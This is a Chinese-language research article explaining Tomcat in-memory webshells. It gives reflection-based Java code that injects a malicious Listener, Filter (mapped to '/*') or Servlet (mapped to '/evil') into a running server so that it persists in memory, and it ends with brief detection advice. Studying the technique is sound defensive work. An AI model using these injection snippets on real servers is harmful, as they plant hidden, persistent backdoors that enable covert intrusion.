Java内存马原理研究<\/h1>

环境准备<\/h2>

Tomcat调试<\/h3>
获取Tomcat源码<\/strong>：<\/p>
git clone https:\/\/github.com\/apache\/tomcat
<\/span><\/span>git checkout 8.5.x
<\/span><\/span><\/code><\/pre><\/li>

构建工具<\/strong>：<\/p>

下载Ant用于构建Tomcat依赖<\/li>
在Tomcat目录执行：ant ide-intellij<\/code><\/li>
<\/ul>
<\/li>

调试配置<\/strong>：<\/p>

使用IntelliJ IDEA，安装Ant插件<\/li>
设置JDK 11环境<\/li>
主类入口：org.apache.catalina.startup.Bootstrap<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
内存马原理<\/h2>
WAR包部署过程<\/h3>


WAR包处理<\/strong>：<\/p>

Tomcat重启时解压WAR包<\/li>
读取并解析web.xml文件<\/li>
配置Servlet、Filter、Listener等组件<\/li>
<\/ul>
<\/li>

关键方法<\/strong>：<\/p>

入口：org.apache.catalina.startup.Bootstrap<\/code><\/li>
核心方法：startInternal()<\/code><\/li>
配置读取：webConfig()<\/code>方法<\/li>
<\/ul>
<\/li>
<\/ol>
HTTP请求生命周期<\/h3>

处理流程<\/strong>：

Listener → Filter → Servlet<\/li>
重点关注Listener、Filter、Servlet三个组件的调用顺序<\/li>
<\/ul>
<\/li>
<\/ol>
Listener内存马<\/h2>
Listener作用<\/h3>


ServletRequestListener<\/strong>：<\/p>

在Filter和Servlet处理请求前后调用<\/li>
关键方法：requestInitialized()<\/code>和requestDestroyed()<\/code><\/li>
<\/ul>
<\/li>

传统注册方式<\/strong>：<\/p>

在web.xml中配置Listener类<\/li>
Tomcat启动时加载<\/li>
<\/ul>
<\/li>
<\/ol>
动态注册Listener<\/h3>


实现原理<\/strong>：<\/p>

利用Servlet 3.0+的动态注册功能<\/li>
反射获取StandardContext<\/code>对象<\/li>
调用addApplicationEventListener()<\/code>方法<\/li>
<\/ul>
<\/li>

关键代码<\/strong>：<\/p>
\/\/ 获取StandardContext
<\/span><\/span><\/span><\/span>Field reqField =<\/span> request.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"request"<\/span>);<\/span>
<\/span><\/span>reqField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Request req =<\/span> (<\/span>Request)<\/span> reqField.<\/span>get<\/span>(<\/span>request);<\/span>
<\/span><\/span>StandardContext context =<\/span> (<\/span>StandardContext)<\/span> req.<\/span>getContext<\/span>();<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建并注册Listener
<\/span><\/span><\/span><\/span>context.<\/span>addApplicationEventListener<\/span>(<\/span>new<\/span> EvilListener());<\/span>
<\/span><\/span><\/code><\/pre><\/li>

内存马特点<\/strong>：<\/p>

首次访问注册Listener<\/li>
后续任意请求触发恶意代码<\/li>
常驻内存直到应用停止或重新部署<\/li>
<\/ul>
<\/li>
<\/ol>
Filter内存马<\/h2>
Filter作用<\/h3>


处理流程<\/strong>：<\/p>

在Listener之后、Servlet之前执行<\/li>
可对请求进行预处理和后处理<\/li>
<\/ul>
<\/li>

传统注册方式<\/strong>：<\/p>

web.xml中配置<filter><\/code>和<filter-mapping><\/code><\/li>
Tomcat启动时初始化<\/li>
<\/ul>
<\/li>
<\/ol>
FilterChain创建过程<\/h3>


关键组件<\/strong>：<\/p>

filterMaps<\/code>：存储URL模式与Filter名称的映射<\/li>
filterDefs<\/code>：存储Filter定义信息<\/li>
filterConfigs<\/code>：存储运行时Filter配置<\/li>
<\/ul>
<\/li>

调用链<\/strong>：<\/p>

ApplicationFilterFactory.createFilterChain()<\/code><\/li>
通过filterMaps<\/code>匹配URL<\/li>
通过filterConfigs<\/code>获取Filter实例<\/li>
<\/ul>
<\/li>
<\/ol>
动态注册Filter<\/h3>


实现步骤<\/strong>：<\/p>

获取StandardContext<\/code>对象<\/li>
创建并注册FilterDef<\/code><\/li>
创建并注册FilterMap<\/code><\/li>
创建ApplicationFilterConfig<\/code>并添加到filterConfigs<\/code><\/li>
<\/ul>
<\/li>

关键代码<\/strong>：<\/p>
\/\/ 创建FilterDef
<\/span><\/span><\/span><\/span>FilterDef filterDef =<\/span> new<\/span> FilterDef();<\/span>
<\/span><\/span>filterDef.<\/span>setFilterName<\/span>(<\/span>filterName);<\/span>
<\/span><\/span>filterDef.<\/span>setFilterClass<\/span>(<\/span>evilFilter.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span>
<\/span><\/span>filterDef.<\/span>setFilter<\/span>(<\/span>evilFilter);<\/span>
<\/span><\/span>context.<\/span>addFilterDef<\/span>(<\/span>filterDef);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建FilterMap
<\/span><\/span><\/span><\/span>FilterMap filterMap =<\/span> new<\/span> FilterMap();<\/span>
<\/span><\/span>filterMap.<\/span>setFilterName<\/span>(<\/span>filterName);<\/span>
<\/span><\/span>filterMap.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span>
<\/span><\/span>context.<\/span>addFilterMap<\/span>(<\/span>filterMap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建FilterConfig
<\/span><\/span><\/span><\/span>Constructor constructor =<\/span> ApplicationFilterConfig.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span>Context.<\/span>class<\/span>,<\/span> FilterDef.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>ApplicationFilterConfig filterConfig =<\/span> (<\/span>ApplicationFilterConfig)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>context,<\/span> filterDef);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 添加到filterConfigs
<\/span><\/span><\/span><\/span>filterConfigs.<\/span>put<\/span>(<\/span>filterName,<\/span> filterConfig);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
Servlet内存马<\/h2>
Servlet作用<\/h3>


处理流程<\/strong>：<\/p>

请求处理的最后阶段<\/li>
实际业务逻辑执行处<\/li>
<\/ul>
<\/li>

传统注册方式<\/strong>：<\/p>

web.xml中配置<servlet><\/code>和<servlet-mapping><\/code><\/li>
可通过load-on-startup<\/code>控制初始化时机<\/li>
<\/ul>
<\/li>
<\/ol>
动态注册Servlet<\/h3>


实现原理<\/strong>：<\/p>

获取StandardContext<\/code>对象<\/li>
创建Wrapper<\/code>对象并设置Servlet类<\/li>
添加到StandardContext<\/code>的children<\/code>中<\/li>
设置URL映射<\/li>
<\/ul>
<\/li>

关键代码<\/strong>：<\/p>
\/\/ 创建Wrapper
<\/span><\/span><\/span><\/span>Wrapper wrapper =<\/span> context.<\/span>createWrapper<\/span>();<\/span>
<\/span><\/span>wrapper.<\/span>setName<\/span>(<\/span>"evilServlet"<\/span>);<\/span>
<\/span><\/span>wrapper.<\/span>setLoadOnStartup<\/span>(<\/span>1<\/span>);<\/span>
<\/span><\/span>wrapper.<\/span>setServletClass<\/span>(<\/span>EvilServlet.<\/span>class<\/span>.<\/span>getName<\/span>());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 添加到children
<\/span><\/span><\/span><\/span>context.<\/span>addChild<\/span>(<\/span>wrapper);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 设置URL映射
<\/span><\/span><\/span><\/span>context.<\/span>addServletMapping<\/span>(<\/span>"\/evil"<\/span>,<\/span> "evilServlet"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
总结<\/h2>


内存马类型<\/strong>：<\/p>

Listener内存马：最早触发，常驻内存<\/li>
Filter内存马：灵活拦截，功能强大<\/li>
Servlet内存马：业务逻辑层，隐蔽性高<\/li>
<\/ul>
<\/li>

关键技术点<\/strong>：<\/p>

反射获取StandardContext<\/code>对象<\/li>
理解Tomcat组件注册机制<\/li>
掌握动态注册组件的API<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

监控动态组件注册行为<\/li>
检查JSP文件异常修改<\/li>
实施运行时内存检测<\/li>
<\/ul>
<\/li>

扩展研究<\/strong>：<\/p>

其他类型内存马(Valve, JSP等)<\/li>
内存马持久化技术<\/li>
内存马检测与对抗技术<\/li>
<\/ul>
<\/li>
<\/ol>